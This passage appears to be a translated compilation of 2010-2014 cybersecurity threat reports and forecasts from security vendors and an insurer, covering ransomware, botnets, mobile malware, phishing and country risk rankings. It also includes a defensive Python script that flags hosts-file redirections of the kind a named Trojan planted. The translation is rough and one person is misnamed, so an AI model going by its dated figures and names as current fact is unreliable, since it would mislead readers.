  • Insurance: companies in this sector, as a rule, handle large volumes of sensitive data that need protection. The frequency of cyber attacks in this sector is growing exponentially as insurers move to digital service channels. The attacks are becoming technically more sophisticated, combining advanced malware with other techniques such as social engineering. While current attacks appear short-term, the report predicts a possible growth of long-term attacks that do not yet attract much attention.
  • Manufacturing: this sector sees a growing number of attacks by hackers and cybercriminals, as well as corporate espionage. Cyber attacks on manufacturers range from phishing to the use of advanced malware, and are aimed not only at IT systems but also at the related industrial control systems.
  • Retail: in this sector credit card data have effectively become a new currency for hackers and criminals. Insider leak threats in retail are growing, fostering a new type of criminal whose purpose is the theft of information, in particular the valuable cardholder data that consumers and retailers exchange.


Zurich: 2013 was the most successful year for cyber-criminals

740 million confidential records were stolen or illegally viewed by cyber-criminals in 2013, the worst year ever by this measure. These data come from a study prepared by the insurer Zurich Insurance Group together with the analytical agency Atlantic Council.

The study states that about 2.5 billion people, nearly a third of the world's population, regularly use the Internet, with an average of about 6 connected devices per person. Every minute 204 million e-mails are sent, 640 terabytes of data are transferred and 100,000 tweets are published.

With data circulating at such volumes, confidential information is in a very vulnerable position, which can become the cause of serious economic shocks. Today there are no technologies sufficient to protect individuals and organisations from all cyber-risks. If a company is unable to mitigate these complex and interconnected risks, the probability of a sudden shock comparable in scale to the collapse of Lehman Brothers in the 2008 mortgage market increases.

The study identifies four sources of cyber-risk: criminals, hackers, spies and the military.

Criminals usually use stolen information in order to sell it. Organisations working with clients' personal data suffer from them more often than others. Hackers act on a larger scale: they disrupt companies' networks or steal information that can compromise an organisation or a person.

The third traditional cyber-threat is espionage, whose targets are companies' research, latest developments, negotiating strategies and business plans. A striking example is last year's case in which Chinese hackers stole the blueprints of the new headquarters of Australia's intelligence service. The fourth group is the military. They specialise in bringing down whole networks and systems, including infrastructure and industrial ones, although this happens quite rarely.

New risks may join this list as early as tomorrow: intrusion into cloud computing, driverless car systems, medical devices and intelligent power grids (smart grid). The ever closer connection of the Internet with the real economy and society can lead to a large-scale shock even more serious than risk managers and Internet specialists are ready to acknowledge. Banks, water supply systems, cars, medical devices and hydroelectric dams can come under attack.

A way out of this situation could be the creation of alternative networks in case of cyber attacks, together with special attention from companies' top management to data protection. Today most companies do not record cyber attacks, and often do not even know that their confidential data have already become the property of cyber-criminals.

Given the current growth in cyber-threats, cyber-risk insurance may in the near future turn from an exotic product into a standard insurance option, and the work of risk engineers will expand to include monitoring of electronic information systems.

  • Threats to finance. In 2013 new malware for breaking into online banking systems spread considerably worldwide, and attacks using ransomware (suffice it to recall the notorious Cryptolocker, which encrypts the user's data and then demands payment for decryption) became more and more frequent (according to the Trend Micro Incorporated report on the 2013 cyberthreat landscape, "Cashing in on Digital Information").
  • Mobile threats. Threats to mobile platforms evolved considerably in both quantity and complexity. This is because more and more hacking tools originally created for the PC were "reoriented" to mobile platforms. By the end of 2013 the total number of detected malicious and dangerous applications for Android reached 1.4 million. Users of Apple products cannot consider themselves fully protected from these dangers either: cybercriminals aim to "master" this wide, and therefore attractive, audience of potential victims. It is no wonder that in 2013 the number of phishing attacks on users of Apple platforms grew.
  • Personal information protection. User accounts on social networks and cloud storage are becoming an ever more attractive target for hackers. Aggressive phishing attacks timed to the release of high-profile platforms such as the PS4 and Xbox One threatened the data security of millions of users.
  • Attacks on infrastructure. High-profile cyber attacks in South Korea showed that today hackers are able to organise large-scale operations against critical elements of infrastructure.
  • Unsupported software. Concerns about the end of support for some versions of Java and for Windows XP were among the key issues of 2013. For the latter, the release of updates and patches will stop in April 2014.

Cyber attacks on IT corporations and media

2013 was remembered for a number of milestone events, one of which was a series of cyber attacks on leading media and IT corporations located mainly in the USA: at various times the New York Times, Wall Street Journal and Washington Post, as well as Twitter, Facebook, Evernote, Apple and Microsoft came under attack. To varying degrees these attacks led to leaks of personal data of company employees and service users.

Thus the cyber attack on Adobe Systems resulted in the compromise of tens of millions of customer accounts and the leak of source code for such widespread products as Adobe Acrobat, ColdFusion and Photoshop.

Social networks are open to attack

However, hackers' activity was directed not only at IT companies but also at ordinary users. In February ESET experts detected the PokerAgent malicious code, which infected players of the Zynga Poker Facebook application. The hackers' goal was users' personal data and information on the bank cards linked to their accounts. To obtain the data, a botnet of several hundred infected devices executing instructions from a command centre was created. As a result PokerAgent stole data from more than 16,000 Facebook accounts.

Another notable piece of malware threatening social network regulars was aimed only at Russian users: the Win32/Bicololo.A Trojan spread through phishing messages disguised as links to harmless image files. When such a link was activated, the malware was loaded instead of an image.

Once on the computer, Bicololo modified system files so that when the user tried to visit VKontakte or Odnoklassniki, or to check their mail, they entered their credentials on a fake page belonging to the attackers.
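The redirection Bicololo planted is a classic hosts-file hijack, and it is simple to check for. The following Python script is an added example, not code from the original article or from ESET: it parses hosts-file text and flags any entry that maps a watched domain to an address other than loopback or 0.0.0.0. The watched-domain list and the sample hosts content are constructed assumptions for this example.

```python
"""Check a hosts file for the kind of redirection Bicololo planted.

Added example (not from the original article or from ESET): parses hosts-file
text and flags entries that pin well-known mail or social-network domains to an
address that is neither loopback nor unspecified. The watched-domain list and the
sample hosts content are constructed assumptions for this example.
"""
import ipaddress
import os
import sys

# Assumed domains to watch: the sites the article names as Bicololo's targets.
WATCHED_DOMAINS = {"vk.com", "vkontakte.ru", "odnoklassniki.ru", "ok.ru", "mail.ru"}

# Standard hosts-file locations (Windows and POSIX).
HOSTS_PATH = (r"C:\Windows\System32\drivers\etc\hosts" if os.name == "nt"
              else "/etc/hosts")

# Constructed sample: a normal hosts file with two appended redirections.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
# --- appended by malware (constructed for the example) ---
203.0.113.17    vk.com www.vk.com
203.0.113.17    odnoklassniki.ru
0.0.0.0         ads.example.invalid   # ordinary ad-blocking entry, benign
"""


def parse_hosts(text):
    """Yield (address, hostname) pairs, skipping comments, blanks and malformed lines."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip trailing comments
        if not line:
            continue
        fields = line.split()
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # first field is not an IP address: not a hosts entry
        for name in fields[1:]:
            yield addr, name.lower()


def is_watched(hostname):
    """True if hostname is a watched domain or one of its subdomains."""
    return any(hostname == d or hostname.endswith("." + d) for d in WATCHED_DOMAINS)


def find_hijacks(text):
    """Return [(hostname, address)] for watched names mapped to a non-local address.

    Loopback (127.0.0.1, ::1) and unspecified (0.0.0.0, ::) targets are how
    ad-blocking hosts files neutralise a name, so they are not reported. Any other
    address for a watched domain sends the browser to a third-party server, which
    is exactly the fake-login-page pattern described for Bicololo.
    """
    return [(name, str(addr)) for addr, name in parse_hosts(text)
            if is_watched(name) and not (addr.is_loopback or addr.is_unspecified)]


if __name__ == "__main__":
    # Scan the real hosts file when run with --system, else the constructed sample.
    if "--system" in sys.argv:
        with open(HOSTS_PATH, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_HOSTS
    for name, address in find_hijacks(text):
        print(f"suspicious hosts entry: {name} -> {address}")
```

Run with `--system` to inspect the machine's own hosts file; without it the script checks the constructed sample and reports the two injected entries.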

Phishing attacks on Internet messengers

In 2013 not only social network users but also fans of instant messaging came under attack. Thus a large-scale spam campaign detected by ESET experts in Skype, Gtalk, QIP and some other messengers endangered more than half a million users around the world (including 40,000 users in Russia). Using phishing messages, criminals infected systems with malware and gained access to victims' personal and authentication data.

Another large attack was the distribution of spyware among Polish users. Analysts at ESET's virus laboratory in Krakow recorded an attack on users of Skype, MSN Messenger, Jabber, GTalk, ICQ and other messengers. The Spy.Agent program collected information on visited sites, installed applications and Wi-Fi passwords, logged keystrokes and even eavesdropped on calls.

Capture of cybercriminals

But the actions of cybercriminals did not go unanswered: thanks to Microsoft's efforts, the Citadel botnet was dismantled in 2013. With the assistance of law enforcement agencies, providers and intelligence agencies, the corporation carried out an operation to disrupt one of the world's largest botnets. The damage from its activity at that time exceeded half a billion dollars.

William Ulbricht, the founder of the Silk Road website for trading in banned drugs, was also unlucky: he was arrested in the USA. At the other end of the world, in Russia, Ulbricht's "colleague", the hacker known as Paunch, was also detained. He became known as the owner of the well-known Blackhole exploit kit, which cybercriminals around the world actively used for covert penetration of users' systems.

Threats to Tor

In the middle of the year cybercriminals picked up the trend toward anonymity: ESET experts detected the Atrax botnet, technically the most sophisticated and interesting botnet for the Tor anonymous network. Because data transmission in this network is slow, the botnet was not used to steal large volumes of data. Instead it collected information entered into login forms on various portals and downloaded additional malicious files onto the PC. Atrax gets onto the PC via a special malicious page disguised as the PayPal customer support website.

Detecting and destroying this botnet's command centre is a difficult task, since in this case the anonymity of Tor protects not users but cybercriminals. It can be assumed that, as migration into the "hidden Internet" grows, we will see new, technologically even more sophisticated threats for Tor.

Mobile threats

Botnets of mobile devices became another, so far rather exotic, kind of botnet. First recorded in 2012, today most malware for Android contains functionality for combining infected smartphones and tablets into botnets.

As for mobile threats in general, compared with the same period of the previous year the number of new malware families for Android (which still account for up to 99% of all mobile threats) grew by 43.6% in 2013, and this is not only about growing activity of known threats but also about the emergence of new categories of software:

  • Loader: tries to download other malware from the Internet and install it on the device.
  • Dropper: installs other threats on the device when started; the threats are contained in the dropper's body.
  • Clicker: intended to generate traffic to websites by artificially inflating click counts.
  • Banking malware: specialises in stealing the user's confidential information used for online banking transactions.

The SMS Trojan detected by ESET products as TrojanSMS.Agent became one of the most active mobile threats (its modifications are especially active in Russia and the countries of the former USSR). In 2011, 31 modifications of this program were detected; in 2013, 324 were already recorded. Such Trojans can secretly send messages to premium-rate numbers, draining the user's mobile account.

In 2013 the total number of malware for the Android platform grew by 63%. The highest growth rates of Android threats were seen in Iran, China and Russia.

Similar growth rates will continue in 2014; new mobile threats will show not only quantitative but also qualitative growth, in particular exploiting vulnerabilities in mobile platforms and their components more and more actively.

Ransomware

Ransomware activity also grew significantly in 2013: ESET experts detected rapid growth in the activity of the FileCoder encrypting Trojan, which demands a ransom to decrypt the user's personal files, in Russia. Compared with the average level recorded in the first half of 2013, FileCoder activity increased by more than 200%. According to ESET, more than 44% of detections of this program were among Russian users.

Another encryptor that spread in 2013, CryptoLocker, used a countdown as a psychological lever: the infected user was given only 70 hours to pay the ransom and regain access to the encrypted personal data. Otherwise the user said goodbye to them forever.

The Nymaim Trojan detected by ESET experts can also lock the user's computer to extract a ransom. Earlier, infection with this software was carried out via the already mentioned BlackHole exploit kit, but later cybercriminals switched to distribution through Google search. Having clicked a malicious URL in the search results, the user, instead of the information sought, initiated the download of a malicious archive.

In 2014 one should not expect ransomware activity to decline either; in particular, the emergence of new modifications will be spurred by the popularity of the Bitcoin virtual currency. Thanks to its anonymity and high exchange rate, cybercriminals will increasingly demand ransoms in bitcoins. Some cybercriminals, however, have decided not to extort bitcoins from users but to steal them directly: a new modification of the well-known Hesperbot banking Trojan, widespread in Europe, is now aimed at theft of the electronic currency. The theft is carried out by gaining access to the e-wallet containing the secret keys.


WatchGuard: Suppliers of cloud services will suffer from large-scale network attacks

2012 for the sphere of information security will be difficult and at the same time interesting in terms of development of technologies. We submit the new forecast of WatchGuard for the 2012th in terms of threats in the field of network and information security[33].

In the 2012th the large-scale wave of organized network attacks on cloud services and cracking of large suppliers of cloud computing is expected. At the same time protection of network assets of suppliers of cloud services will reach the new level of development.

Why clouds are extremely interesting targets for cracking?

  • Great number of clients store the confidential data in clouds where they can be easily available to malefactors.
  • When developing cloud services difficult information technologies which can have serious vulnerabilities are used.
  • Most of suppliers of cloud services use the difficult, made to order Web applications and technologies of virtualization which at incorrect settings can pose considerable security risk of data in clouds.

For the organization of the attacks to corporate networks malefactors will use new technologies and the malicious software of APT

In 2012 the malware, difficult and resistant to detection — Advanced Persistent Threats (APT) will actively develop.

In the 2011th the governments of many countries, management systems for production process and the large world companies suffered from APT threats. Using this software RSA SecureID, Transaction ShadyRat were cracked. Besides, there was a successor of the net worm of Stuxnet — the Duqu worm.

It is expected that this year the malware APT will be improved and APT threats will be aimed not only at the corporate sector, but also at ordinary users.

Large leakages of confidential data are expected

Due to the emergence of the difficult malware APT, new authors of the malware and groups of professional hackers, such as Anonymous and LulzSec, in the 2011th occurred much more the incidents connected with large network attacks than in previous years.

It is hard to say precisely what to a large extent influenced so significant increase in number of network attacks. Perhaps, malefactors became more organized, there were many professional groups of hackers or the new regulations requiring were entered that the companies announced all happened attacks and date leaks. Anyway it is expected that the tendency to increase in number of leaks will remain also in the 2012th.

Demand for solutions on ensuring virtual security will increase

In 2012 interest in security solutions of the systems of virtualization among small and medium-sized companies considerably will increase.

Until recently many IT specialists working in small and medium business up to the end did not realize how serious can be risk of data loss at insufficient attention to questions of the correct implementation of virtual environments.

Now the situation will change: in new year demand not only for technologies of virtualization, but also for means of ensuring of information security of virtual environments will grow.

On-line shops of mobile applications for smartphones and communicators 'will help' fast distribution of the mobile malware

Malefactors will still concentrate attention on mobile devices, to be exact on online stores of the mobile software. To avoid threat of infection with the mobile malware, it is necessary to show a certain care when loading mobile applications from on-line shops and also it is obligatory to consider reputation of the seller and developer of the application.

The problem connected with BYOD will result in the bigger number of date leaks

Use by employees of personal mobile devices in working networks of the companies (Bring Your Own Device, BYOD) can lead to serious date leaks.

The specialists supporting permitting employees to use the mobile devices in corporate network say that BYOD will help the companies to reduce significantly the costs connected with the IT sector, to increase labor productivity, to reduce load of technical support services and just to make work of personnel more convenient and comfortable.

But except obvious benefits which are brought by BYOD it should be taken into account that at the same time there is a risk of leak of important information and emergence of the problems connected with centralized operation by these devices.

The Facebook network will remain a main target for attackers (network attacks, account compromise using social engineering methods, malicious software)

In 2011 the Facebook network became the largest source of malicious URLs, overtaking in popularity such a threat as malicious attachments in e-mail.

In 2012 the number of network attacks, both on individual Facebook users and on the network as a whole, will increase considerably. In this regard, a large number of updates to Facebook's security system are expected this year, along with the introduction of new, effective solutions for protecting the network.

Attackers will begin to organize attacks directed at the physical equipment of network infrastructure

This year there will be at least one large network attack aimed at putting the physical equipment of a network infrastructure out of action.

In theory, the possibility of such attacks, for example against power supply systems, has been known for a long time, but nobody had heard of one being carried out until the compromise performed by the Stuxnet network worm. This worm can infect SCADA equipment and make changes to the system, directly affecting the operation of physical equipment.

At the moment SCADA systems are a main object of research both for attackers and for security specialists, as modern malware has very broad functionality and can effectively infect industrial process control systems.

Attackers will build user geolocation functions into malware, allowing attacks to be targeted more precisely

Geolocation is one of the main topics of discussion among security experts, as such functionality in software potentially violates the human right to privacy. Such information can be used for tracking people and their habits.

In 2012 a set of malware with geolocation capabilities will appear, thanks to which attacks will become more targeted. Simple geolocation capabilities are already used in malware today, allowing attackers to select targets based on users' location and thus to choose the most effective attack methods for different regions of the world. It is expected that this year attackers will make more active use of geolocation to strengthen the harmful impact of network attacks.

The HTML5 standard will give attackers a set of opportunities for compromising websites

For many years the Internet has been a battlefield between hackers and users. In 2011 the majority of network attacks targeted web applications, allowing attackers to steal terabytes of data.

The use of dynamic web technologies such as Web 2.0 and HTML5 is one of the driving factors behind the increase in attacks on web applications. Dynamic web technologies are extremely powerful and undoubtedly very useful, but they also have a number of shortcomings connected with security vulnerabilities. They are used by almost all large websites and by the largest cloud computing providers. However, if web technologies and secure coding techniques are used incorrectly when developing web applications, attackers will have many opportunities to compromise and bypass the protection of corporate networks. In 2012 the number of network attacks on web applications will increase tens of times over.

Symantec: Cyber conflicts will become the norm

In December 2012 Symantec Corporation published its forecast of cyber security trends for 2013. According to the corporation's experts, in 2013 attacks will become more aggressive and will be carried out not only for profit or espionage but also to demonstrate the attackers' power. In addition, the number of threats to users of mobile and cloud computing and to the audience of social networks will increase.

Cyber conflicts will become the norm

From 2013, conflicts between states, organizations and individuals will largely move into cyberspace. Online espionage has a high success rate and an extremely low degree of provability. Governments, as well as various organized groups of people, will continue to use cyber attacks to damage or destroy the confidential information or financial resources of their opponents. In 2013 we will witness virtual 'sabre-rattling', when governments, organizations or even groups of individuals use cyber attacks to show their power or to make themselves known.

Symantec's experts also expect growth in the number of targeted attacks whose target is an individual or a non-governmental organization that, for example, holds certain political views or represents a minority in one conflict or another. Recently we have seen such attacks in situations where the behavior of certain people or organizations becomes a subject of discontent for one 'hacktivist' group or another.

Ransomware succeeds fake antiviruses

While the prevalence of fake antiviruses is slowly fading away, even tougher kinds of threats are appearing in cyberspace. So-called ransomware (from the English 'ransom') is gaining popularity around the world; these extortion programs are already quite popular in Russia.

Although this 'business model' had been used before, it suffered from the same shortcoming as ordinary theft: there was no convenient way to collect the money. Thanks to the development of online payment systems, attackers have solved this problem.

Lockers will go beyond simple extortion and turn to intimidation, i.e. cyber-bullying (cyber attacks intended to cause psychological harm). Next year criminals will reach a new level, playing on the victims' emotions and using methods after which it will be much harder to recover a system.

Mobile advertising will complicate the situation

Mobile advertising software (madware) is a nuisance that can not only seriously interfere with the use of the device but also hand over to attackers part of your location, contact information and device identifiers. A madware program, which silently gets onto the device when a third-party application is installed, often starts to flood the user with pop-up windows, creates shortcuts, changes browser settings and collects the user's personal data. In the last nine months alone, the number of applications including the most aggressive types of madware has grown by 210%. Data on the location and characteristics of the device may be legitimately purchased by Internet advertising aggregators to serve more relevant advertising. Symantec's experts expect to see growing use of programs of this kind as companies seek to increase revenue from mobile advertising. This is where a more aggressive and potentially harmful way of monetizing 'free' mobile applications comes in.

Monetization of social networks will create new dangers

Cybersecurity specialists note that users treat social networks with great trust, from sharing personal data to buying game currency and virtual gifts for friends. As social networks, in order to increase monetization, give users the ability to give each other such gifts, the growing turnover of money on social networks gives attackers new opportunities to carry out attacks.

Symantec's cybersecurity experts expect growth in the number of attacks aimed at stealing payment data on social networks and at deceiving users so that they hand over this and other data to counterfeit social networks. These may include fake gift notifications and e-mails asking the user to specify their home address and other personal information. And although providing non-financial information may seem harmless, attackers trade and exchange it, combining the data with what they already have, which often lets them gain access to really valuable information.

Attackers will follow users to mobile and cloud computing

Attackers go where the users are, and at the moment that is cloud and mobile computing. Cloud and mobile platforms will become attackers' targets in 2013. The rapid growth in the number of malware samples for Android in 2012 supports this forecast.

Besides, the inclusion in corporate networks of unprotected devices that collect information which then ends up in other cloud storage considerably increases the risk of leakage or targeted capture of data. Users' installation of new applications eventually, inevitably, leads to infection.

Some malicious mobile programs duplicate the functionality of earlier threats, for example those that steal information from devices. However, something new also appears from time to time. For example, in the days of dial-up modems there were programs that dialed premium-rate 900 numbers belonging to hackers. Today malware sends paid SMS messages, and the attackers collect the proceeds. In 2013 mobile technologies will develop further, which will create new opportunities for cybercriminals.

The increasingly popular eWallet technology will inevitably become one more platform that attackers will try to exploit. And as mobile payment technologies are adopted everywhere, mobile devices will become still more valuable. By analogy with the Firesheep threat, which intercepted other people's Wi-Fi sessions, one should expect programs that will intercept users' payment information. Some payment systems are widely popular among technically unsophisticated users and may have vulnerabilities that could lead to theft of information.

Increase in the number of data leaks and lost devices, and how to take care of the future

Personal data on about 1.1 million people was the average result of each successful attack in 2011. This is a sharp increase compared with previous years. Such incidents were a serious threat: in 2011 data on 187 million people was stolen. However, the most frequent cause of data leaks was theft or loss of a laptop or other storage medium, for example a smartphone, a flash drive or a backup medium. As a result of such leaks, data on 18.5 million people was exposed.

As sales of tablets and smartphones continue to overtake PC sales, every year they will carry more and more confidential information. Employees bring their own smartphones and tablets and connect them to corporate systems before the organization has managed to deploy protection and device management tools. This can lead to an increase in the number of data leaks, since without proper protection the loss of a mobile device puts the information stored on it at risk. Recent Symantec research shows that 50% of lost phones will not be returned to their owners, and in 96% of cases (including returned ones) there will be a data leak.

Mobile threats hit business and individual users

In 2011 the number of mobile vulnerabilities grew by 93%. At the same time, growth in threats to the Android system was noted. With the growing number of vulnerabilities in mobile devices, attackers not only adapt existing malware for mobile devices but also create specialized malware that uses all the capabilities of the mobile platform. In 2011 mobile viruses for the first time posed a real threat to business and individual users. These threats are intended for data collection, content transfer and tracking of users.

Kaspersky Security Bulletin: Country ranking by the security level of Internet surfing

Experts at Kaspersky Lab earlier prepared their traditional annual report on cyberthreats, Kaspersky Security Bulletin 2011. Among the most telling figures in the report was the degree of infection risk to which computers in different countries of the world are exposed during web surfing.

The analysts compiled a ranking of the states most dangerous for Internet surfing; its leader at the end of 2011 was Russia, where more than 55% of unique Internet users were subjected to web attacks.

Ranking of the countries most dangerous for Internet surfing

Source: Kaspersky Lab, 2012

Yury Namestnikov, the author of the statistical report, noted that the statistics on encounters with cyberthreats during web surfing 'show the level of aggressiveness of the environment in which the computer works'. In 2011 this indicator grew by 2% worldwide and reached 32.3%.

The experts noted that in 2011 there were significant changes in the top three. Russia (+2.2%) rose from third place to first. Second place remained with Oman, with an indicator of 54.8%. The USA, with 50.1%, rose to third place from fifth. Over the year the risk level during web surfing in Iraq decreased considerably, from 61.8% to 45.4%; this country fell from first place in the ranking to eighth.

After the top three, the 'top ten' countries most dangerous for Internet surfing were distributed as follows: Armenia, Belarus, Azerbaijan, Kazakhstan, Iraq, Ukraine, Guinea-Bissau.

Kaspersky Lab classifies all countries in the ranking by the degree of infection risk during Internet surfing. The 'high-risk group', with results of 41-60%, includes 22 countries led by Russia. The 'risk group', with indicators of 21-40%, includes 118 countries, among them Italy (38.9%), the UAE (38.2%) and France (37%).

Nine countries can be classed in the 'group of the safest countries for Internet surfing' (0-20%): Ethiopia (20.5%), Haiti (20.2%), Denmark (19.9%), Niger (19.9%), Togo (19.6%), Burundi (18.6%), Zimbabwe (18.6%), Benin (18.0%), Myanmar (17.8%). Germany, Japan, Luxembourg, Austria and Norway, whose indicators in 2010 ranged from 19% to 20%, moved into the risk group.

Apart from Denmark, the group of safe countries consists almost entirely of newcomers to the ranking, developing countries of Africa and Asia. Their presence in this group is explained by the nature of file distribution in these countries: the Internet is still not very well developed there, and various removable media are actively used for file sharing.

Top 20 countries by the amount of malware hosted on their resources

According to Kaspersky Lab, in 2011 attackers used 4,073,646 domains to carry out 946,393,693 attacks over the Internet. Servers hosting malicious code were detected in 198 countries of the world. 86.4% of all recorded malicious hosting was located in the Internet space of twenty countries. Of these, 14.6% of all attacks came from Russia, second place after the USA. Next by number of outgoing attacks come the Netherlands, Germany, Ukraine, China, Great Britain and others.

Source: Kaspersky Lab, 2012

The researchers noted that although the first two positions were taken by the same countries as a year earlier, the active growth in the share of malicious hosting recorded in these countries in previous years has stopped. This was helped by active action by law enforcement agencies to shut down botnets. However, although the percentage of malicious hosting in these countries decreased slightly, it still remains at a very high level, the experts said.

Country ranking by readiness for cyber threats

Sweden, Finland and Israel are named the countries best prepared for cyber attacks in the world. This was stated in the McAfee Security & Defence Agenda (SDA) research.

In the ranking of 23 countries by their readiness to repel cyber threats, the maximum rating of 5 stars was not awarded to anyone this year. In second place after the leaders were eight countries, including the USA, Great Britain, France and Germany, which received 4 stars.

Australia, Canada, Japan and Austria were rated 3.5 stars; Italy, China, Poland and Russia received 3 stars; Brazil, India and Romania got 2.5 stars. Mexico came last with only 2 stars.

Top 23 countries of the world by level of cyber security

Source: McAfee, January 2012

According to Phyllis Schneck, chief technology officer of McAfee, 'evil moves much faster than good', and this is why none of the countries managed to receive the highest mark.

As for Russia, most experts find it very difficult to abstract from its reputation as 'a country engaged in cyber espionage'. In October 2011 officials of the US counterterrorism committee, addressing Congress, said that Russia represents 'a permanent threat to the economic security of the USA'. According to one expert, 'Russia is a country of bandits with great hackers'.

Vladimir Chizhov, Russia's permanent representative to the European Union, then criticized this position. 'This type of threat can be countered successfully only on the basis of international cooperation', he said.

Meanwhile, the report said that some of Russia's efforts to regulate the cyber security sphere are having a positive effect. These include new laws on personal data protection, the development of the digital signature and changes to the domain name registration procedure (previously it was performed without any verification).

2010: Symantec data

In 2010 Symantec detected more than 286 million new threats. This huge number of threats was accompanied by the emergence of several important new trends. First, 2010 saw sharp growth in both the frequency and the sophistication of targeted attacks on enterprises. Second, social networks began to be used by attackers as platforms for distributing attacks. Third, attackers changed tactics: they all increasingly began to use Java vulnerabilities to compromise traditional computer systems. Finally, a sharp growth in fraudsters' interest in mobile devices was noted [34]

Year of targeted attacks

Targeted attacks such as Hydraq and Stuxnet posed a growing threat to enterprises in 2010. For successful and unnoticed penetration into enterprise computer networks, attackers used previously unknown vulnerabilities (so-called zero-day vulnerabilities). Stuxnet, for example, used four such vulnerabilities at once to carry out its attack.

In 2010 attackers attacked a number of various large multinational corporations and government agencies, and also a surprising number of small companies. Often attackers gathered information on specific employees of the targeted corporation and then developed an individual approach to the specific victim (generally using social engineering methods) to gain access to the target company's network. Thanks to such targeting, many of these attacks succeeded even against organizations where basic security measures were observed.

The widely publicized targeted attacks of 2010 aimed at stealing intellectual property or causing physical damage. However, many less well-known targeted attacks were also aimed at individuals to gain access to their personal information. According to the report, on average in 2010 one successful compromise led to the personal data of 260,000 people becoming publicly exposed.

Social networks: fertile ground for cyber crime

The popularity of social networks continues to grow, and malware creators could not ignore it. Most often attackers use short URLs, which are normally used to reduce the number of characters in a message on Twitter and the like, or to present a long link on a website or in a letter more neatly. In 2010 fraudsters distributed millions of such links on social networks in order to lure users to phishing sites or to infect them with a virus or other malware. This caused a growth in the number of successful infections.

The report notes that attackers exploited the news feeds of popular social networks for mass malicious activity to the maximum. The typical scenario looked like this: the attacker logs into a hijacked social network account and posts a short link to the malicious website in the status. The social network then automatically sends the link to the news feeds of the victim's friends, spreading it to hundreds or thousands of victims within minutes. Symantec Corporation recorded that in 2010, 65% of malicious URLs in news feeds were short URLs. Of these, 73% were clicked more than 10 times, and 33% from 11 to 50 times.

Ready-made attack toolkits focused on Java

Exploit kits for attacks are computer programs that can be used by both advanced hackers and beginners to simplify the launch of large-scale attacks. Such tools were used everywhere in 2010 and increasingly exploited Java vulnerabilities, which accounted for 17% of all vulnerabilities in web browser plug-ins in 2010. As a popular multi-platform technology that is not tied to a particular browser, Java remains an attractive target for attackers.

Phoenix became the basis for the majority of web attacks carried out in 2010. Like many other kits, it also contains elements that exploit Java vulnerabilities. In the reporting period, the top 6 web attacks used exploits for Java vulnerabilities.

The number of web attacks recorded daily in 2010 increased by 93% compared with 2009. And given that, according to Symantec, two thirds of all these threats were created using ready-made toolkits, they could have been the cause of such sharp growth.

The pattern of attackers' actions in the mobile space is becoming clear

The spread of mobile platforms has reached a level at which attackers simply cannot fail to pay attention to it. In this regard Symantec expects an increase in the number of attacks on these platforms. In 2010 mobile devices were attacked mainly by Trojan programs masquerading as legitimate applications. And although some of these programs were developed by attackers 'from scratch', in many cases users were infected by malicious code inserted into initially legitimate applications. The attackers then distributed these infected applications through public online stores. The authors of the Pjapps Trojan, for example, used exactly this approach.

Although the new security architectures used in modern mobile devices are no less effective than those of desktop computers and servers, attackers often manage to bypass this protection using internal vulnerabilities in mobile platforms. Unfortunately, such flaws are quite common: during 2010 Symantec Corporation detected 163 vulnerabilities that attackers could use to gain partial or full control over devices running popular mobile platforms. Within the first months of 2011, attackers had already used these flaws to infect hundreds of thousands of devices.

Threat landscape: key figures and facts

  • 286 million new threats – 2010 was characterized by the variety of malware and by the emergence of new mechanisms for its distribution, which caused further growth in the volume of malicious technologies. In 2010 Symantec encountered more than 286 million unique malware variants;
  • The number of web attacks grew by 93% – Thanks to ready-made tools for carrying out web attacks, their number increased by 93% in 2010. The wide use of short URL services also contributed;
  • 260,000 'human victims' per successful attack – This is the average number of people whose personal data ended up publicly exposed after a compromise in 2010;
  • 14 new zero-day vulnerabilities – Zero-day vulnerabilities played a key role in targeted attacks such as Hydraq and Stuxnet. Stuxnet alone used four different zero-day vulnerabilities;
  • 6,253 new vulnerabilities – In 2010 Symantec documented more vulnerabilities than in any previous reporting period;
  • The number of detected mobile vulnerabilities grew by 42% – The growth in the number of newly recorded vulnerabilities in mobile operating systems, from 115 in 2009 to 163 in 2010, became a sign that cybercriminals are beginning to focus on the mobile space;
  • 1 botnet with more than 1 million spam bots – There was a period in 2010 when Rustock, the largest botnet observed in 2010, controlled more than one million bots. Other botnets, such as Grum and Cutwail, lagged not far behind, each controlling many hundreds of thousands of bots;
  • 74% of spam related to pharmaceutical products – In 2010 about three quarters of all spam advertised pharmaceutical medicines;
  • $15 for 10,000 bots – Monitoring advertisements on the shadow market in 2010, Symantec found that 10,000 bots were on sale for only 15 US dollars. Bots are usually used for spam mailings and distribution of fake software, but recently they have increasingly been used for DDoS attacks;
  • From $0.07 to $100 per credit card – In 2010 the prices of credit card details on underground forums varied over a broad range. The rarity of the card and discounts for bulk purchase were the factors dictating the price.

Measures against cybercriminals

To resist effectively a threat whose scale has grown so strikingly in recent years, companies need to treat information security as one of the key components of their operating activities. The question of responsibility should become the highest priority. Since the problem of information security has acquired strategic importance, board members of the company should pay paramount attention to solving this difficult task.

Introducing the position of Chief Information Security Officer into the company's organizational structure should become one of the first important steps. The CISO or head of security does not, as a rule, sit on the board, but should have the right of direct access and report either directly to the board or to an official who is at most one step below the board in the hierarchy. The CISO must inform senior managers of the importance of information security measures and secure the allocation of the necessary resources. The next decision, made at board level, is drawing up the list of data and systems whose protection is of paramount importance. After the divisions and systems needing protection have been determined, scenarios for countering attacks are developed, taking into account the list of potential attackers, their goals, time and financial resources. Along with this, after risk assessment, an information security management system must be implemented.

It is important that all departments are properly involved in the work at all the stages listed. One more essential point is awareness work among the organization's staff. Each employee needs to have basic knowledge in the field of information security; in this case it will be possible to counter at least the simplest tricks often used by attackers, such as sending malware in e-mail attachments. Technology alone is still not enough; its role is only to help people make the right decisions and take the right actions.

Install a firewall

Every company, including small ones, should have a firewall limiting access to its network. It is your first line of defense.[35]

Provide access control

Employees' use of the Internet in the office should be carefully controlled. In addition, organizations should have an antivirus and content-filtering gateway, which will become their second line of defense.

Carry out regular inspections

Network administrators or managers should re-verify all user accounts and data access rights monthly, or at least once a quarter.

Do not forget about physical protection

